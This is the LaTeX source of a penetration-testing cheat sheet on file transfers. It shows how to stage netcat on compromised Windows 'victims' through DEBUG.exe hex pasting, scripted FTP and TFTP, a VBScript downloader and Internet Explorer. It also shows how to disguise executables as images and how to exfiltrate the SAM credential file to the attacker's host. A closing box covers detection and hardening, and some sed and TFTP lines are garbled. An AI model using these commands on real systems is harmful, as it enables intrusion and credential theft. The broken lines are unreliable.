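% File Transfers Cheat Sheet (Cheatography export, author "fred").
%
% Layout: a fancyhdr header and footer built from tabulary tables, and a body
% set in four columns (multicols*) of fixed-width tabularx boxes, one box per
% topic. Build with pdfLaTeX: \pdfinfo below is a pdfTeX primitive.
%
% Source hygiene: every "%" comment sits on its own physical line or at the
% end of one. If the file is collapsed onto long lines, the first "%" comments
% out all the code that follows it on that line.
\documentclass[10pt,a4paper]{article}

% Packages
\usepackage{fancyhdr}           % For header and footer
\usepackage{multicol}           % Allows multicols in tables
\usepackage{tabularx}           % Intelligent column widths
\usepackage{tabulary}           % Used in header and footer
\usepackage{hhline}             % Border under tables
\usepackage{graphicx}           % For images
\usepackage{xcolor}             % For hex colours
%\usepackage[utf8x]{inputenc}   % For unicode character support
\usepackage[T1]{fontenc}        % Without this we get weird character replacements
\usepackage{colortbl}           % For coloured tables
\usepackage{setspace}           % For line height
\usepackage{lastpage}           % Needed for total page number
\usepackage{seqsplit}           % Splits long words.
%\usepackage{opensans}          % Can't make this work so far. Shame. Would be lovely.
\usepackage[normalem]{ulem}     % For underlining links
% Most of the following are not required for the majority
% of cheat sheets but are needed for some symbol support.
\usepackage{amsmath}            % Symbols
\usepackage{MnSymbol}           % Symbols
\usepackage{wasysym}            % Symbols
%\usepackage[english,german,french,spanish,italian]{babel}   % Languages

% Document Info
\author{fred}
\pdfinfo{
  /Title (file-transfers.pdf)
  /Creator (Cheatography)
  /Author (fred)
  /Subject (File Transfers Cheat Sheet)
}

% Lengths and widths
\addtolength{\textwidth}{6cm}
\addtolength{\textheight}{-1cm}
\addtolength{\hoffset}{-3cm}
\addtolength{\voffset}{-2cm}
\setlength{\tabcolsep}{0.2cm}   % Space between columns
\setlength{\headsep}{-12pt}     % Reduce space between header and content
\setlength{\headheight}{85pt}   % If less, LaTeX automatically increases it
\renewcommand{\footrulewidth}{0pt}   % Remove footer line
\renewcommand{\headrulewidth}{0pt}   % Remove header line
\renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi}   % Hyphens in seqsplit
% These two commands together give roughly
% the right line height in the tables
\renewcommand{\arraystretch}{1.3}
\onehalfspacing

% Commands
% \SetRowColor stores the colour name globally so that \mymulticolumn, used
% later in the same row, can paint its cell with the same colour.
\newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}}   % Shortcut for row colour
\newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}}   % For coloured multi-cols
\newcolumntype{x}[1]{>{\raggedright}p{#1}}   % New column types for ragged-right paragraph columns
\newcommand{\tn}{\tabularnewline}   % Required as custom column type in use
% Commands and file names. The export left Markdown backticks around them,
% which LaTeX typesets as opening quotation marks; \shcmd sets them in
% typewriter type instead.
\newcommand*{\shcmd}[1]{\texttt{#1}}
% Header logo. The path is an absolute location on the generator's build host
% and does not exist elsewhere, so the header includes it only when present.
\newcommand*{\CheatographyLogo}{/web/www.cheatography.com/public/images/cheatography_logo.pdf}

% Font and Colours
\definecolor{HeadBackground}{HTML}{333333}
\definecolor{FootBackground}{HTML}{666666}
\definecolor{TextColor}{HTML}{333333}
\definecolor{DarkBackground}{HTML}{A3A3A3}
\definecolor{LightBackground}{HTML}{F3F3F3}
\renewcommand{\familydefault}{\sfdefault}
\color{TextColor}

% Header and Footer
\pagestyle{fancy}
\fancyhead{}   % Set header to blank
\fancyfoot{}   % Set footer to blank
\fancyhead[L]{
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{C}
    \SetRowColor{DarkBackground}
    \vspace{-7pt}
    {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent
        \hspace*{-6pt}\IfFileExists{\CheatographyLogo}{\includegraphics[width=5.8cm]{\CheatographyLogo}}{}}
    }
\end{tabulary}
\columnbreak
\begin{tabulary}{11cm}{L}
    \vspace{-2pt}\large\textbf{\textcolor{DarkBackground}{\textrm{File Transfers Cheat Sheet}}} \\
    \normalsize by \textcolor{DarkBackground}{fred} via \textcolor{DarkBackground}{\uline{cheatography.com/22666/cs/9067/}}
\end{tabulary}
\end{multicols}}

\fancyfoot[L]{
\footnotesize
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{LL}
    \SetRowColor{FootBackground}
    \mymulticolumn{2}{p{5.377cm}}{\bfseries\textcolor{white}{Cheatographer}} \\
    \vspace{-2pt}fred \\
    \uline{cheatography.com/fred} \\
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
    \SetRowColor{FootBackground}
    \mymulticolumn{1}{p{5.377cm}}{\bfseries\textcolor{white}{Cheat Sheet}} \\
    \vspace{-2pt}Published 9th September, 2016.\\
    Updated 9th September, 2016.\\
    Page {\thepage} of \pageref{LastPage}.
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
    \SetRowColor{FootBackground}
    \mymulticolumn{1}{p{5.377cm}}{\bfseries\textcolor{white}{Sponsor}} \\
    \SetRowColor{white}
    \vspace{-5pt}
    %\includegraphics[width=48px,height=48px]{dave.jpeg}
    Measure your website readability!\\
    www.readability-score.com
\end{tabulary}
\end{multicols}}

\begin{document}
\raggedright
\raggedcolumns

% Set font size to small. Switch to any value
% from this page to resize cheat sheet text:
% www.emerson.emory.edu/services/latex/latex_169.html
\footnotesize   % Small font.

\begin{multicols*}{4}

% --- Info ---------------------------------------------------------------
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bfseries\textcolor{white}{Info}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{\textbf{Check Transfer Progress} \newline
\seqsplit{http://www.cyberciti.biz/open-source/command-line-hacks/pv-command-examples/}}
\tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% --- DEBUG.exe ----------------------------------------------------------
% The export read "64-bytes"; the size limit of DEBUG.EXE is 64 KB, which is
% why the sheet compresses nc.exe with UPX before converting it.
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bfseries\textcolor{white}{DEBUG.exe}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{\textbf{Note:} Uploaded file cannot be larger than 64~KB. UPX can be used to compress files. \newline
\shcmd{locate exe2bat.exe} \newline
\shcmd{wine exe2bat.exe} \newline
\shcmd{upx -9 nc.exe} (to compress nc.exe) \newline
\shcmd{ls -l nc.exe} (should now be smaller) \newline
\shcmd{wine exe2bat.exe /root/nc.exe nc.txt} (convert nc.exe to nc.txt) \newline
\shcmd{cat nc.txt | more} (should be a hex dump) \newline
Near the end of nc.txt, exe2bat tells the debugger on the Windows victim to create an exe \newline
Gain your shell using your usual exploit then copy and paste the contents of nc.txt into the remote shell. If it fails, re-run any failed commands manually. nc.exe will now be created on the victim machine.}
\tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% --- Python -------------------------------------------------------------
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bfseries\textcolor{white}{Python}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{\textbf{Victim} \newline
\shcmd{python -m SimpleHTTPServer} \newline
\textbf{Attacker} \newline
Browse to victim from attacking machine for a directory listing}
\tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% --- Netcat -------------------------------------------------------------
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bfseries\textcolor{white}{Netcat}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{\shcmd{nc -lvp 12345 | tar -xf -} (on receiver) \newline
\shcmd{tar -cf - filename.txt | nc -vn 192.168.1.14 12345} (on sender) \newline
\textbf{Note:} You will have no indication of file progress. Just wait a period of time then CTRL+C \newline
\seqsplit{http://www.g-loaded.eu/2006/11/06/netcat-a-couple-of-useful-examples/}}
\tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% --- FTP - Windows ------------------------------------------------------
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bfseries\textcolor{white}{FTP - Windows}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{Connect to an ftp server on port 80 \newline
\shcmd{ftp} \newline
\shcmd{open x.x.x.x 80} \newline
Connect using commands in config.txt \newline
\shcmd{ftp -n -v -s:config.txt 10.2.10.14} \newline
\shcmd{config.txt:} \newline
\shcmd{user uid1234} (username) \newline
\shcmd{uid1234} (password) \newline
\shcmd{quit}}
\tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% --- FTP Upload ---------------------------------------------------------
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bfseries\textcolor{white}{FTP Upload}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{Outbound FTP is usually allowed in companies. \newline
\textbf{Kali} \newline
\shcmd{pure-pw useradd hacker -u ftpusers -d /ftphome/} (create user hacker) \newline
\shcmd{pure-pw mkdb} \newline
\shcmd{cp /pentest/windows/nc.exe /ftphome} \newline
\shcmd{/etc/init.d/pure-ftpd start} \newline
\shcmd{ftp 127.0.0.1} (test login) \newline
\shcmd{ls} (nc.exe should appear) \newline
\shcmd{bye} \newline
\textbf{Victim (Windows)} \newline
After getting a shell: \newline
\shcmd{echo open 192.168.34.10 \textgreater{} ftp.txt} (commands to be run in the -s step) \newline
\shcmd{echo myftp\textgreater{}\textgreater{} ftp.txt} (no space between username and append command) \newline
\shcmd{echo myftp\textgreater{}\textgreater{} ftp.txt} \newline
\shcmd{echo bin \textgreater{}\textgreater{} ftp.txt} \newline
\shcmd{echo get nc.exe \textgreater{}\textgreater{} ftp.txt} \newline
\shcmd{echo bye \textgreater{}\textgreater{} ftp.txt} \newline
\shcmd{ftp -s:ftp.txt} (-s run commands in ftp.txt)}
\tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% --- FTP - Pure-FTPD ----------------------------------------------------
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bfseries\textcolor{white}{FTP - Pure-FTPD}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{\shcmd{/etc/init.d/pure-ftpd start} (start ftp server) \newline
\shcmd{netstat -antp} (confirm server on port 21) \newline
\shcmd{/etc/init.d/pure-ftpd stop} (stop ftp server) \newline
\shcmd{ls -l /ftphome} (home ftp directory created by ftpd) \newline
\shcmd{cp nc.exe /ftphome} (copy netcat to ftphome) \newline
\shcmd{ftp 127.0.0.1} (login ftp to server) \newline
\shcmd{ls} (netcat should appear) \newline
\shcmd{bin} (switch to binary for file transfer) \newline
\shcmd{get nc.exe} (confirm file transfer works) \newline
\shcmd{bye} \newline
\shcmd{file nc.exe} (confirm file properties are intact)}
\tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% --- Internet Explorer --------------------------------------------------
% Markup repairs: the export placed the closing backtick inside \seqsplit, and
% the rename command carried a stray "to" between its two arguments.
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bfseries\textcolor{white}{Internet Explorer}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{Can be good for bypassing Firewalls \newline
\shcmd{mv nc.exe nc.jpg} (exe files will open a dialog, so they need to be converted) \newline
\shcmd{./ability-linux} (gain your remote shell) \newline
\shcmd{cd prog*} \newline
\shcmd{cd internet*} \newline
\shcmd{start iexplore.exe \seqsplit{http://192.168.8.173/nc.jpg}} (nc.jpg will be downloaded to temp directory) \newline
Navigate to the temporary internet files on the victim (e.g. c:\textbackslash{}documents and settings\textbackslash{}offsec\textbackslash{}local settings\textbackslash{}temporary internet files) \newline
\shcmd{copy nc.jpg c:\textbackslash{}} \newline
\shcmd{cd\textbackslash{}} \newline
\shcmd{rename nc.jpg nc.exe} \newline
\shcmd{nc.exe} (nc should be functional)}
\tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% --- down.vbs -----------------------------------------------------------
% Only the header comments and constants of the script are on the sheet.
% The export had broken the first constant's name across two rows; it is
% rejoined here.
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bfseries\textcolor{white}{down.vbs}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{'Barabas pure vbs downloader - tested on XP sp2 \newline
'Microsoft fixed adodbstream but guess what :) \newline
'(c)dec 2004 \newline
'First argument = complete url to download \newline
'Second Argument = filename you want to save \newline
'thnks to \seqsplit{http://www.ericphelps.com/scripting/samples/BinaryDownload/} \newline
' \newline
'v2 - now includes proxy support for the winhttp request stuff \newline
strUrl = \seqsplit{WScript.Arguments.Item(0)} \newline
StrFile = \seqsplit{WScript.Arguments.Item(1)} \newline
'WinHttpRequest proxy settings. \newline
Const \seqsplit{HTTPREQUEST\_PROXYSETTING\_DEFAULT} = 0 \newline
Const \seqsplit{HTTPREQUEST\_PROXYSETTING\_PRECONFIG} = 0 \newline
Const \seqsplit{HTTPREQUEST\_PROXYSETTING\_DIRECT} = 1}
\tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% --- VBS Download (with down.vbs) ---------------------------------------
% NOTE(review): the sed expressions are reproduced as exported and look
% garbled (the first one has no replacement field) -- confirm against the
% author's original. The grep pattern read "down.dbs" and is corrected to
% the file name used everywhere else in this box.
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bfseries\textcolor{white}{VBS Download (with down.vbs)}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{\shcmd{cat down.vbs} (confirm contents) \newline
\shcmd{sed 's/\textasciicircum{}echo /' download-vbscript} (add echo to start of lines) \newline
\shcmd{sed 's/\textasciicircum{}echo /' download-vbscript | sed 's/S/ \textgreater{}\textgreater{} down.vbs/'} (add append to end of lines) \newline
\shcmd{sed 's/\textasciicircum{}echo /' download-vbscript | sed 's/S/ \textgreater{}\textgreater{} down.vbs/' | grep -v 'echo \textgreater{}\textgreater{} down.vbs'} (remove echo on blank lines) \newline
\shcmd{/etc/init.d/apache2 start} \newline
\shcmd{cp nc.exe /var/www/} \newline
After getting a shell on your Victim: \newline
Copy and paste the text output of the final sed command above and hit enter to create down.vbs. \newline
\shcmd{cscript down.vbs \seqsplit{http://192.168.8.173/nc.exe} nc2.exe} (to run down.vbs, which will download nc.exe to nc2.exe) \newline
\shcmd{nc.exe} (check if file is functional)}
\tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% --- TFTP Server --------------------------------------------------------
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bfseries\textcolor{white}{TFTP Server}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{\textbf{Kali} \newline
\shcmd{apt-get install atftpd} \newline
\shcmd{atftpd -{}-daemon -{}-port 69 /tmp} (start in daemon mode on port 69, home directory /tmp) \newline
\shcmd{atftpd -{}-daemon -{}-port 1234 /tmp} (start in daemon mode on port 1234, home directory /tmp) \newline
\shcmd{netstat -anup | grep atftp} (should be listening on port 69 udp) \newline
\shcmd{cp /nc.exe /tmp} \newline
\textbf{Downloading in Linux} \newline
\shcmd{tftp 127.0.0.1} (connect to server) \newline
\shcmd{get nc.exe} \newline
\shcmd{quit} \newline
\shcmd{ls -l nc.exe} \newline
\shcmd{file nc.exe} \newline
\textbf{Kill Server} \newline
\shcmd{ps -ef | grep atftp} \newline
\shcmd{kill -9 16084} (first column number) \newline
\shcmd{netstat -anup | grep 69} (confirm server has been killed)}
\tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% --- TFTP ---------------------------------------------------------------
% NOTE(review): the second Kali line has no command verb in the export
% (presumably a copy into /tmp) -- confirm against the author's original.
% Its backtick had also landed inside \seqsplit; only the markup is repaired.
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bfseries\textcolor{white}{TFTP}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{\textbf{Note:} Most corporate firewalls will block outbound traffic rendering TFTP unusable. TFTP might not be on Windows machines. Files transferred will usually be read only. Change attrib of file to delete using attrib -r filename. \newline
\textbf{Download from Attacker} \newline
\textbf{Kali} \newline
\shcmd{atftpd -{}-daemon -{}-port 69 /tmp} \newline
\shcmd{\seqsplit{/usr/share/windows-binaries/nc.exe} /tmp} \newline
\shcmd{chmod 777 /tmp/nc.exe} \newline
\textbf{Windows} \newline
Initiate your remote shell to the Windows PC using your exploit: \newline
\shcmd{./ability-linux.py} (ability exploit, served, shell started) \newline
\shcmd{cd\textbackslash{}} \newline
\shcmd{tftp -i 192.168.23.10 GET nc.exe} (on Windows Victim, IP = Kali) \newline
\textbf{Upload to Attacker} \newline
\shcmd{tftp -i 192.168.8.172 PUT sam} \newline
sam should now appear in /tmp on the Kali machine \newline
\textbf{Download in Windows} \newline
\shcmd{tftp get 2.3.5.1:/lanscan} (get the file lanscan from TFTP server 2.3.5.1)}
\tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% --- Detection & Hardening ----------------------------------------------
% Reviewer-added box: what each transfer method above looks like from the
% defending side, so the sheet is usable for detection work and for the
% findings section of a report.
\begin{tabularx}{3.833cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{3.833cm}}{\bfseries\textcolor{white}{Detection \& Hardening}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{3.833cm}}{\textbf{Cleartext:} FTP, TFTP and raw netcat carry files unencrypted, and FTP carries its login the same way, so network sensors see both. \newline
\textbf{Egress:} Allow outbound 21/tcp and 69/udp only to approved hosts, and check the protocol rather than the port: this sheet runs FTP over port 80. \newline
\textbf{Process telemetry:} Alert on \shcmd{ftp -s:}, \shcmd{tftp -i}, \shcmd{cscript} with a URL argument, \shcmd{debug.exe} and \shcmd{python -m SimpleHTTPServer}. \newline
\textbf{File type:} Classify downloads by content, not extension; a renamed executable such as nc.jpg still starts with the bytes MZ. \newline
\textbf{Staging hosts:} The HTTP, FTP and TFTP services above serve their directory to anyone who can reach the port; stop them after use and avoid world-writable modes such as 777.}
\tn
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

% That's all folks
\end{multicols*}

\end{document}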